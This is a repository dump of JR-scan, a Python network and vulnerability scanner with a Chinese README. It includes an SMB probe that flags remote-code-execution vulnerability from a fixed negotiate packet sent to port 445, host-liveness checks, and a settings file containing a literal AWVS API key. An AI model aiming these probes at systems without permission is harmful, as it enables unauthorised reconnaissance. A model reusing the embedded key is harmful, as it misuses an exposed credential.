/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/RDP_CodeExecution.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/windows/__pycache__/smb_code_execution.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/windows/smb_code_execution.py:
--------------------------------------------------------------------------------
import socket
import struct
import sys

from termcolor import cprint
 4 | 
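class smb_code_execution_BaseVerify:
    """Send one fixed SMB2 request to port 445 and inspect the reply.

    The request appears to be an SMB2 NEGOTIATE (the ``\\xfeSMB`` magic is
    visible in the packet); the exact meaning of the fields is not documented
    here. The reply is treated as "vulnerable" when the bytes at offsets
    68..70 are ``\\x11\\x03`` and 70..72 are ``\\x02\\x00``; anything else,
    including a network error or a truncated reply, is reported as not
    vulnerable. Only this one exchange takes place — nothing is executed on
    the target.
    """

    def __init__(self, url):
        # Same bytes as before, split into adjacent literals for readability.
        # The first four bytes are a big-endian length prefix (0xc0 = 192),
        # the same framing run() reads back from the reply.
        self.pkt = (
            b'\x00\x00\x00\xc0'
            b'\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'$\x00\x08\x00\x01\x00\x00\x00\x7f'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'x\x00\x00\x00\x02\x00\x00\x00'
            b'\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03'
            b'\x00\x00\x00\x00'
            b'\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
            b'\x00\x00\x00\x00'
            b'\x03\x00\n\x00\x00\x00\x00\x00'
            b'\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        )
        self.url = url

    @staticmethod
    def _recv_exact(sock, size):
        """Read exactly ``size`` bytes from ``sock``.

        Raises:
            ConnectionError: the peer closed the connection before ``size``
                bytes arrived (a short read would otherwise silently shift
                the offsets checked in run()).
        """
        buf = bytearray()
        while len(buf) < size:
            chunk = sock.recv(size - len(buf))
            if not chunk:
                raise ConnectionError("connection closed after %d of %d bytes" % (len(buf), size))
            buf.extend(chunk)
        return bytes(buf)

    def run(self):
        """Run the probe. Returns True when the vulnerable pattern is seen, otherwise None."""
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        try:
            sock.connect((str(self.url), 445))
            sock.sendall(self.pkt)  # send() may write only part of the buffer
            nb, = struct.unpack(">I", self._recv_exact(sock, 4))
            res = self._recv_exact(sock, nb)
            if res[68:70] != b"\x11\x03" or res[70:72] != b"\x02\x00":
                cprint("[+]不存在SMB远程代码执行漏洞\t", "red")
            else:
                cprint("[+]存在SMB远程代码执行漏洞\t", "red")
                return True
        except (OSError, struct.error):
            # Connect/timeout/short-read failures are reported as "probably
            # not vulnerable" rather than aborting the scan.
            cprint("[-] " + __file__ + "====>可能不存在漏洞", "cyan")
        finally:
            # Previously the socket was closed only on the error path.
            sock.close()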
30 | 
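if __name__ == '__main__':
    # Standalone entry point: the host is the first CLI argument; without one
    # the probe targets 127.0.0.1 as the original script did.
    target = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
    smb = smb_code_execution_BaseVerify(target)
    smb.run()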


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # JR-scan
 2 | 利用python3写的综合扫描工具,可“一键”实现基本信息收集(端口、敏感目录、WAF、服务、操作系统),支持POC扫描(可自行添加POC,操作简单),支持利用AWVS探测,未来争取实现xray联动。  
 3 | 在启动扫描器后,傻瓜式操作即可完成扫描。  
 4 | 扫描器允许进行单个扫描,批量扫描(从文件列表里扫描网站),C段扫描  
 5 | 启动方法:直接利用Python3运行JR.py即可  
 6 | 提示:最好是在Linux环境下运行,win的话,可能会出现编码问题!!!  
 7 | 
 8 | 启动界面  
 9 | 
10 | ![image](https://github.com/675354981/JR-scan/blob/master/images/%E5%90%AF%E5%8A%A8.png)    
11 | 
12 | 数据库界面  
13 | 
14 | ![image](https://github.com/675354981/JR-scan/blob/master/images/dbs.png)    
15 | 
16 | 网站整体界面  
17 | 
18 | ![image](https://github.com/675354981/JR-scan/blob/master/images/%E6%95%B4%E7%AB%99.png)    
19 | 
20 | 端口界面  
21 | 
22 | ![image](https://github.com/675354981/JR-scan/blob/master/images/port.png)    
23 | 
24 | URL界面  
25 | 
26 | ![image](https://github.com/675354981/JR-scan/blob/master/images/url.png)    
27 | 
28 | 漏洞界面  
29 | 
30 | ![image](https://github.com/675354981/JR-scan/blob/master/images/vuln.png)
31 | 


--------------------------------------------------------------------------------
/__pycache__/report.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/__pycache__/report.cpython-37.pyc


--------------------------------------------------------------------------------
/__pycache__/report.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/__pycache__/report.cpython-38.pyc


--------------------------------------------------------------------------------
/images/dbs.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/dbs.png


--------------------------------------------------------------------------------
/images/image:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/images/port.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/port.png


--------------------------------------------------------------------------------
/images/url.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/url.png


--------------------------------------------------------------------------------
/images/vuln.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/vuln.png


--------------------------------------------------------------------------------
/images/启动.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/启动.png


--------------------------------------------------------------------------------
/images/子域名.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/子域名.png


--------------------------------------------------------------------------------
/images/整站.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/images/整站.png


--------------------------------------------------------------------------------
/lib/__pycache__/active.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/active.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/active.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/active.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/bcolors.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/bcolors.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/bcolors.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/bcolors.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/cli_output.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/cli_output.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/cli_output.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/cli_output.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/enter.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/enter.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/enter.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/enter.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/setting.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/setting.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/setting.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/setting.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/sqldb.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/sqldb.cpython-37.pyc


--------------------------------------------------------------------------------
/lib/__pycache__/sqldb.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/lib/__pycache__/sqldb.cpython-38.pyc


--------------------------------------------------------------------------------
/lib/active.py:
--------------------------------------------------------------------------------
 1 | import concurrent.futures
 2 | import subprocess
 3 | import re
 4 | import xml
 5 | import platform  # 获取操作系统的相关信息
 6 | import time
 7 | import nmap  # nmap模块
 8 | import dns.resolver
 9 | from urllib import parse  # parse模块的作用:url的解析,合并,编码,解码
10 | from lib.cli_output import console
11 | from lib.setting import PING
12 | 
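class ActiveCheck:
    """Filter a list of targets down to the ones that look alive.

    Each entry of ``hosts`` is a URL or a bare host/IP. ``pool()`` runs
    ``check`` over all of them on a thread pool and returns the original
    strings of those that passed.
    """

    def __init__(self, hosts):
        self.hosts = hosts
        self.out = []  # original target strings that passed the check

    @staticmethod
    def _host_of(url):
        """Return the host part of *url* to hand to DNS / ping / nmap.

        ``urlparse`` only fills ``netloc`` when a scheme is present; a bare
        host lands in ``path``. ``hostname`` is preferred over ``netloc`` so
        that a ``user:pass@`` prefix or a ``:port`` suffix is stripped —
        passing the raw netloc made ``ping host:8080`` / ``nmap host:8080``
        fail and the target was reported as not alive.
        """
        loc = parse.urlparse(url)  # urlparse()实现URL的识别和分段
        if loc.netloc:
            return loc.hostname or loc.netloc
        return loc.path

    def check(self, url):  # 检测导入的IP
        """Probe one target; append *url* to ``self.out`` when it is alive.

        Returns False when the target is rejected (its A record points at a
        resolver / loopback / unspecified address, or ping/nmap report it
        down) and None otherwise — callers must read ``self.out`` rather
        than the return value.
        """
        host = self._host_of(url)

        try:
            # 判断是IP还是域名,域名的话需要检测域名解析
            if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
                # 验证DNS存活并且DNS解析不能是一些特殊IP(DNSIP、内网IP)
                answer = dns.resolver.query(host, 'A')  # 查询类型为A记录
                for rrset in answer.response.answer:
                    for rdata in rrset.items:
                        if hasattr(rdata, 'address') and re.search(
                                r'1\.1\.1\.1|8\.8\.8\.8|127\.0\.0\.1|114\.114\.114\.114|0\.0\.0\.0',
                                rdata.address):
                            return False

            if not PING:
                # No liveness probe configured: a resolvable target counts as alive.
                self.out.append(url)
                return None

            try:
                # Windows调用ping判断存活 Linux调用nmap来判断主机存活
                # nmap判断存活会先进行ping然后连接80端口,这样不会漏掉
                if platform.system() == 'Windows':
                    # argument list, no shell: host cannot break out of the command line
                    subprocess.check_output(['ping', '-n', '2', '-w', '1', host])
                    self.out.append(url)
                else:
                    scanner = nmap.PortScanner()
                    result = scanner.scan(hosts=host, arguments='-sP -n')
                    for _, info in result.get('scan').items():
                        if info.get('status').get('state') != 'up':
                            console('PING', host, "is not alive\n")
                            return False
                        self.out.append(url)
            except Exception:
                # ping exiting non-zero, nmap unavailable, or an unexpected
                # result shape all mean "treat as down" (was a bare except,
                # which also swallowed KeyboardInterrupt).
                console('PING', host, "is not alive\n")
                return False

        except (dns.resolver.NoAnswer, dns.resolver.NXDOMAIN, dns.resolver.NoNameservers):
            console('DnsCheck', host, "No A record\n")  # 描述失败原因
        except dns.exception.Timeout:
            console('DnsCheck', host, "Timeout\n")
        return None

    def pool(self):  # 数据处理模块
        """Run ``check`` over ``self.hosts`` concurrently and return the alive ones."""
        try:
            with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
                futures = {executor.submit(self.check, target): target for target in self.hosts}
                # as_completed() raises TimeoutError after 3s; the executor's
                # __exit__ still waits for every submitted check, so results
                # are not lost — the loop merely stops surfacing exceptions.
                for future in concurrent.futures.as_completed(futures, timeout=3):
                    future.result()  # re-raises anything check() let escape
        except Exception:
            # Best effort: a timeout or a crashed check must not abort the scan.
            pass
        return self.out  # 返回存活的主机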
74 | 
if __name__ == "__main__":
    # Smoke test: probe the local host and report the elapsed time.
    started = time.time()
    alive = ActiveCheck(['127.0.0.1']).pool()
    elapsed = time.time() - started
    print(alive)
    print(f'\nrunning {elapsed:.3f} seconds...')
81 | 


--------------------------------------------------------------------------------
/lib/bcolors.py:
--------------------------------------------------------------------------------
class Bcolors:
    """ANSI SGR escape sequences for coloured terminal output.

    Wrap text as ``Bcolors.RED + text + Bcolors.ENDC``; ``ENDC`` resets
    every attribute set by the others.
    """
    ENDC = '\x1b[0m'       # reset
    RED = '\x1b[31m'
    MAGENTA = '\x1b[35m'
    GREEN = '\x1b[92m'     # bright green
    WARNING = '\x1b[93m'   # bright yellow
    BLUE = '\x1b[94m'      # bright blue
    WHITE = '\x1b[1;37m'   # bold white
9 | 


--------------------------------------------------------------------------------
/lib/cli_output.py:
--------------------------------------------------------------------------------
 1 | import pyfiglet   #ascii艺术字体
 2 | from lib.bcolors import Bcolors
 3 | import time
 4 | import sys
 5 | 
def banner():   #载入界面
    """Print the tool's ASCII-art banner in red."""
    art = pyfiglet.figlet_format("JinRong")    #使用字符组成ASCII艺术图片
    print(''.join([Bcolors.RED, art, Bcolors.ENDC]))
 9 | 
def usage():
    """Print the numbered main-menu help text in blue."""
    lines = [
        '帮助:',
        '    [1]Information_Scan         信息收集',
        '    [2]POC_Scan                 POC扫描',
        '    [3]AWVS_Check               AWVS检测',
        '    [4]H5_Create                结果展示',
        '    [5]Help                     帮助',
        '    [6]Exit                     退出',
    ]
    print(Bcolors.BLUE + '\n'.join(lines) + Bcolors.ENDC)
19 | 
def console(plugins, domain, text):     #目标检测展示界面    已定义  目标  内容  console('PING', host, "is not alive\n")
    """Write one coloured status line: ``[HH:MM:SS] - plugins - domain    text``.

    *text* is written verbatim, so callers include the trailing newline
    themselves. All three arguments must be strings.
    """
    stamp = time.strftime("%H:%M:%S", time.localtime())
    parts = [
        Bcolors.BLUE, '[', stamp, ']', Bcolors.ENDC,
        ' - ',
        Bcolors.RED, plugins, Bcolors.ENDC,
        ' - ',
        domain,
        '    ',
        Bcolors.GREEN, text, Bcolors.ENDC,
    ]
    sys.stdout.write(''.join(parts))
26 | 
if __name__ == '__main__':
    # Quick visual check of the banner when run directly.
    banner()


--------------------------------------------------------------------------------
/lib/enter.py:
--------------------------------------------------------------------------------
 1 | import ipaddress    #处理IPv4和IPv6地址的
 2 | import re
 3 | from lib.active import ActiveCheck
 4 | 
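def add(target):
    """Expand *target* into a list of alive hosts.

    *target* is one of: a ``.txt`` file (one host per line), a CIDR block
    such as ``10.0.0.0/24``, or a single host/URL. Always returns a list;
    it is empty when nothing was alive or the input could not be processed
    (previously the bare ``except`` fell through and returned None, which
    broke callers that iterate the result).
    """
    try:
        if re.search(r'\.txt$', target):
            hosts = read_file(target)
        elif re.search(r'(\.\d+\/\d+$)', target):
            hosts = inet(target)
        else:
            hosts = [target] if ActiveCheck([target]).pool() else []
        return hosts or []
    except Exception as e:
        # Best effort: report the failure and hand back an empty list.
        print("The task could not be carried out. {}".format(str(e)))
        return []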
28 |             
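def read_file(file):  #文件
    """Read one host per line from *file* and return the ones that are alive.

    Blank lines are skipped (they used to be passed on as empty hosts).
    Returns an empty list rather than None when the file does not exist,
    so callers can iterate the result unconditionally.
    """
    try:
        with open(file, 'rt') as f:
            hosts = [line.strip() for line in f if line.strip()]   #保存到host列中
    except FileNotFoundError:
        print('input file not found: {}'.format(file))
        return []
    return ActiveCheck(hosts).pool()   #对不存在的IP进行测试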
39 | 
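def inet(net):   #C段
    """Expand the CIDR block *net* and return the hosts in it that are alive.

    ``strict=False`` accepts any address inside the block
    (``192.168.1.1/24`` as well as ``192.168.1.0/24``); with strict
    parsing the former raised ValueError and nothing was scanned.
    Returns whatever ``ActiveCheck`` yields for an empty list when *net*
    cannot be parsed.
    """
    hosts = []
    try:
        # 将C段切为一个个单独IP,写入列中 — every address in the block, network and broadcast included
        hosts = [str(ip) for ip in ipaddress.ip_network(net, strict=False)]
    except (ValueError, TypeError) as e:
        print("The task could not be carried out. {}".format(str(e)))
    return ActiveCheck(hosts).pool()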
50 | 
51 | 
52 | 
53 | 


--------------------------------------------------------------------------------
/lib/setting.py:
--------------------------------------------------------------------------------
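import os

# 全局超时时间
TIMEOUT = 5

# 设置扫描线程
THREADS = 100

# 如果存在于结果db中就跳过
CHECK_DB = False

# ping探测
PING = True

# 设置cookie
COOKIE = 'random'
# COOKIE = {'Cookie': 'SRCtest'}

# awvs api
# Read from the AWVS_APIKEY environment variable when set; the literal is
# only a fallback. A key that has been committed to source control should
# be treated as exposed and replaced on the AWVS side.
apikey = os.environ.get('AWVS_APIKEY', '1986ad8c0a5b3df4d7028d5f3c06e936ccf47470c374d42f3a38c950f4bc80394')

# subdomain dir
sub_dict = 'Information_Scan/data/path/wydomain.csv'
next_sub_dict = 'Information_Scan/data/path/next_sub_full.txt'
cnd_dict = 'Information_Scan/data/path/cdn_servers.txt'

# async dir
# NOTE: shadows the builtin dir(); name kept because other modules import it.
dir = 'Information_Scan/data/path/dir.txt'

# 目录扫描模式
dict_mode = 1

# 递归爬取模式
crawl_mode = 1

# 设置代理
# SOCKS5 = ('127.0.0.1', 1080)
SOCKS5 = ()

# 递归扫描的目录 — XPath selecting the attributes the crawler follows
crawl_mode_parse_html = "//*/@href | //*/@src | //form/@action"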
40 | 


--------------------------------------------------------------------------------
/report/fonts/element-icons.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/report/fonts/element-icons.ttf


--------------------------------------------------------------------------------
/report/fonts/element-icons.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/report/fonts/element-icons.woff


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
# NOTE(review): json, re and time are Python standard-library modules, not
# PyPI distributions; `pip install -r requirements.txt` fails on those lines.
# NOTE(review): the code imports `nmap` and `dns`, which are provided by
# python-nmap and dnspython respectively; the `dns==0.0.1` / `nmap==0.0.1`
# pins look like mismatched distribution names — confirm before installing.
gevent==20.9.0
json
re 
time
termcolor==1.1.0
pyfiglet==0.8
dns==0.0.1
dnspython==2.0.0
nmap==0.0.1
geoip2==4.1.0
PySocks
bs4
lxml
IPy==1.00
15 | 


--------------------------------------------------------------------------------
/result.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/result.db


--------------------------------------------------------------------------------